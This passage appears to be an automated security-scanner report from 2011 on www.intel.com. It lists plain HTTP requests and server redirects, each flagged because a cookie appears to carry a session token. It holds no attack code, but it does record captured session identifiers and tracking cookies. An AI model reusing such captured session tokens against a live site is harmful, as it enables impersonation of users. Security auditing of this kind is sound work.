INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/education/index.htm?iid=subhdr+cr_edu Content-Length: 17 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:12 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=ODDLKMPAJLLLEKPMALBBNMCH; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/environment/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/environment/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:12 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=APMMGNPAKAIIPDFPNGEIOCDK; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation Content-Length: 24 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:13 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=KPMMGNPAGBGBKNKDNKKIDJNM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/foundation/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/foundation/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:12 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=AFDLKMPANJAOFEGACEBHHBGF; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:07 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=MKMMGNPANGBLFGPHPJJOGEIO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kr/business/index.htm?iid=gg_ko_KR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_ko_KR+noscript Content-Length: 21 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:18:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:43 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=NCMFCODAECIHHJFBMEHEGEOE; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsroom/assets/images/ HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:21:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:06 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=OAFLKMPAABHFKKFICLMGCMIN; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/en_US/business/technology HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Type: text/html; charset=UTF-8 IBM-Web2-Location: /p/portal/business/technology/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwNDE6B8JG55AwMCur30o9Jz8pOA9oSDbMZvElgeB3A00PfzyM9N1S_IjagMDkhXBABpMSwF/dl3/d3/L2dBISEvZ0FBIS9nQSEh/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Content-Language: en Server: IA Web Server Vary: User-Agent Vary: Cookie Date: Sat, 05 Feb 2011 23:20:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000b61jWhWIDSmDzsCh1APYcFV:13pbf30ea; Path=/ Content-Length: 42117
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <script type="text/javascript">try { document.domain = "intel.c ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pressroom/index.htm?iid=gg_about+intel_pressroom HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom Content-Length: 28 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:21 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=CNDLKMPAGDIJIBBEMEHCBBPH; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/products Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:23 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=OIMFCODAEALLMGGILFOKNGOK; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
